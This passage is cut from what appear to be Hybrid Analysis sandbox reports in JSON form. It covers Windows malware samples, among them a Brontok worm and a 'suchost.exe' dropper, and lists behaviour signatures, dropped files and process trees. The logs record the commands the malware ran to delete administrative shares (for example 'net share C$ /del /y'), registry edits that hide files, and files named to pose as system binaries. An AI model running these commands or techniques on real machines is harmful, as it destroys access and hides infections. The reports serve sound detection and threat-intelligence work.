80386 for MS Windows\"- Location: [C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe]- [targetUID: 00000000-00002084]\n \"7zFM.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"7zG.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Uninstall.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"suchost.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\drivers\\suchost.exe]- [targetUID: 00000000-00003536]\n \"DW20.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE]- [targetUID: 00000000-00002084]\n \"suchost.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has section name CODE with entropy \"6.44913603294\"\n \"setup.exe\" has section name CODE with entropy \"6.35642713495\"\n \"7zFM.exe\" has section name CODE with entropy \"6.34487673294\"\n \"7zG.exe\" has section name CODE with entropy \"6.34487673294\"\n \"Uninstall.exe\" has section name CODE with entropy \"6.35524477264\"\n \"suchost.exe\" has section name CODE with entropy \"6.44913603294\"\n \"DW20.EXE\" has section name CODE with entropy \"6.35996783919\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"suchost.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"suchost.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"suchost.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"suchost.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")\n \"suchost.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"suchost.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" opened \"C:\\Windows\\system32\\drivers\\suchost.exe\" with delete access\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" opened \"C:\\Windows\\System32\\drivers\\SUCHOST.EXE\" with delete access\n \"suchost.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\95$$.Ico\" with delete access\n \"suchost.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\83$$.Ico\" with delete access\n \"suchost.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\77$$.Ico\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"suchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\95$$.Ico\" for deletion\n \"suchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\83$$.Ico\" for deletion\n \"suchost.exe\" marked \"C:\\share\\¡¡¡¡¡¡.exe\" for deletion\n \"suchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\77$$.Ico\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"WinExec\" with parameter %WINDIR%\\system32\\drivers\\suchost.exe (UID: 00000000-00003536)\n \"suchost.exe\" called \"WinExec\" with parameter cmd.exe /c net share Z$ /del /y (UID: 00000000-00002084)\n \"suchost.exe\" called \"WinExec\" with parameter cmd.exe /c net share C$ /del /y (UID: 00000000-00002084)\n \"suchost.exe\" called \"WinExec\" with parameter cmd.exe /c net share admin$ /del /y (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"suchost.exe\" touched \"K:\"\n \"suchost.exe\" touched \"L:\"\n \"suchost.exe\" touched \"M:\"\n \"suchost.exe\" touched \"N:\"\n \"suchost.exe\" touched \"O:\"\n \"suchost.exe\" touched \"P:\"\n \"suchost.exe\" touched \"Q:\"\n \"suchost.exe\" touched \"R:\"\n \"suchost.exe\" touched \"S:\"\n \"suchost.exe\" touched \"T:\"\n \"suchost.exe\" touched \"U:\"\n \"suchost.exe\" touched \"V:\"\n \"suchost.exe\" touched \"W:\"\n \"suchost.exe\" touched \"X:\"\n \"suchost.exe\" touched \"Y:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (UID: 00000000-00003536)\n Spawned process \"suchost.exe\" (UID: 00000000-00003172)\n Spawned process \"suchost.exe\" (UID: 00000000-00002084)\n Spawned process \"cmd.exe\" with commandline \"/c net share Z$ /del /y\" (UID: 00000000-00003484)\n Spawned process \"cmd.exe\" with commandline \"/c net share C$ /del /y\" (UID: 00000000-00003548)\n Spawned process \"cmd.exe\" with commandline \"/c net share admin$ /del /y\" (UID: 00000000-00005192)\n Spawned process \"net.exe\" with commandline \"net share Z$ /del /y\" (UID: 00000000-00000768)\n Spawned process \"net.exe\" with commandline \"net share C$ /del /y\" (UID: 00000000-00003456)\n Spawned process \"net.exe\" with commandline \"net share admin$ /del /y\" (UID: 00000000-00002188)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share admin$ /del /y\" (UID: 00000000-00001956)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share C$ /del /y\" (UID: 00000000-00000516)\n Spawned process \"net1.exe\" with commandline \"%WINDIR%\\\\system32\\\\net1 share Z$ /del /y\" (UID: 00000000-00001284)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\drivers\\suchost.exe\" (Handle: 224)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\drivers\\suchost.exe\" (Handle: 224)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\drivers\\suchost.exe\" (Handle: 224)\n \"net.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 128)\n \"net.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 128)\n \"net.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 128)\n \"net.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 116)\n \"net.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 116)\n \"net.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 116)\n \"net.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 172)\n \"net.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 172)\n \"net.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\net1.exe\" (Handle: 172)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" allocated memory in \"C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-15", "type": 3, "relevance": 5, "name": "Changes file extension appearance of the explorer", "description": "\"suchost.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\FOLDER\\HIDDEN\\SHOWALL\")\n \"suchost.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\FOLDER\\HIDDEN\\SHOWALL\"; Key: \"CHECKEDVALUE\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38
https://hybrid-analysis.com/sample/765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38
Hybrid Analysis - Killers
{"size": 47177, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "av_detect": 87, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 149, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 47177, "sha256": "9967582b4752688f7ac86f118418d9a2bd593b995c69d9af0c51ab2ba9317e64", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 47177, "sha256": "b9514932d1898cf28babd85d834d131336e4a5c30e32f0c3ce805919ccc8840f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 47177, "sha256": "97b2988ee21362a4b8e0f8c9f83ccae95f2afe9bc43ec491ef604a78ff0600b2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 47177, "sha256": "70c0a32d13f2295c88503e278b5d01e5fbee925f1ee94feb13b4de2758898637", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 47177, "sha256": "d3a5613e562d013ba4e11913479b235e3d7f7c0b2f89e88bc1d51f615be324b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 47177, "sha256": "fe66ac5b36954e47f6c8a57df2e7a344aa8ae4dbfa11b53bf927347f47e87947", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "%WINDIR%\\4k51k4.exe", "file_size": 47177, "sha256": "1bfb3abe90bc419d1bed418ea26cf4a0eac59881195f9d50f13bf6ad0010877e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 47177, "sha256": "bed4db71e438516dd9c4a3aafef38193f88f10417a5ca7a0dd8d739698f1f9a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrHelloween.scr", "file_path": "%WINDIR%\\System32\\MrHelloween.scr", "file_size": 47177, "sha256": "e10f95559fe05438cc1e2ec7003591553d9326d5a79122e000d3f28f92b2f9f3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 47177, "sha256": "c30677e5d1ef4fe25528137c26615ebb7fc1a8b5faf986a41e46237d98733e1a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "C:\\4k51k4.exe", "file_size": 47177, "sha256": "115eda10c7886fa3eebc675520f0c48501444484dc26443d7cb0ad88b18b6dab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Puisi.txt", "file_path": "C:\\Puisi.txt", "file_size": 442, "sha256": "660ecfcd91ba19959d0c348724da95d7fd6dd57359898e6e3bcce600ff3c797d", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS .exe", "file_size": 93833, "sha256": "581163515642a5f4c5bdddf7f686f353d15b64f6526e89415dcb6ed298fdf86f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 47177, "sha256": "d16d0444fface38596b54cebb6ff68af43d21966aee16233096a31da3cd3f887", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 47177, "sha256": "eedb50e83f126a33566c9960fee9fc2db2ee3e149bdc8296c7141b3185cc69be", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 47177, "sha256": "94ba801c1477d2498acc08a6687aca362953f5a9818533673621e859ae0ad844", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C469.bin", "file_size": 47177, "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C7EE.bin", "file_size": 47177, "sha256": "1bfb3abe90bc419d1bed418ea26cf4a0eac59881195f9d50f13bf6ad0010877e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C717.bin", "file_size": 47177, "sha256": "4281c5008ef0f7b255d19c686b4887a98dd45370b50cb5cb4e96967a4d3df0f1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C46B.bin", "file_size": 47177, "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C719.bin", "file_size": 47177, "sha256": "c45fc8a56bde34990bba271c5cd2607382c6cf462b167b0a4c5e35a6d2b44774", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C7F1.bin", "file_size": 47177, "sha256": "bed4db71e438516dd9c4a3aafef38193f88f10417a5ca7a0dd8d739698f1f9a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 47177, "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "IExplorer.exe (PID: 404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005712", "name": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe", "normalized_path": "C:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe", "sha256": "765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38"}, {"uid": "00000000-00006008", "parentuid": "00000000-00005712", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00005992", "parentuid": "00000000-00006008", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00005968", "parentuid": "00000000-00006008", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00006128", "parentuid": "00000000-00006008", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00004244", "parentuid": "00000000-00006128", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00003992", "parentuid": "00000000-00006128", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00003456", "parentuid": "00000000-00006128", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00003180", "parentuid": "00000000-00006128", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00003540", "parentuid": "00000000-00006128", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00003276", "parentuid": "00000000-00006128", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00004428", "parentuid": "00000000-00006128", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00006080", "parentuid": "00000000-00006008", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00006064", "parentuid": "00000000-00006008", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00004208", "parentuid": "00000000-00006064", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00004256", "parentuid": "00000000-00006064", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00003836", "parentuid": "00000000-00006064", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00004408", "parentuid": "00000000-00006064", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00000884", "parentuid": "00000000-00006064", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": 